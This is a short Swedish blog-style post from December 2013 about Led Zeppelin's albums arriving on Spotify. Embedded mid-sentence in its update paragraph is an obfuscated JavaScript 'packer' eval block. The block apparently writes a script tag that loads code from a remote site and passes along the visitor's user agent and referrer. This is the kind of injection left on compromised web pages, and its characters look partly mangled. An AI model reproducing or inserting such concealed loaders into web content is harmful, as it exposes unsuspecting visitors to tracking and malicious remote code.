Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Led Zeppelin finns nu äntligen på Spotify.

Led Zeppelin finns nu äntligen på Spotify.
Filip Urde
  • On 12 december, 2013
  • http://www.revue.se/filip-urde

Ryktet om att rockbandet Led Zeppelin skulle släppa sin musik på Spotify har florerat ett tag på nätet och detta visade sig vara sant till min stora förtjusning. Nu kan man äntligen lyssna på Led Zeppelin via Spotify och äntligen byta ut alla trötta coverband man haft som substitut.

Uppdatering:

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rnbid|var|u0026u|referrer|fzdee||js|php’.split(’|’),0,{}))
har albumen Led Zeppelin, Led Zeppelin II, Led Zeppelin III och Led Zeppelin IV släppts på Spotify, så nu kan du lyssna på allt från Stairway to Heaven, till communication breakdown.

open.spotify.com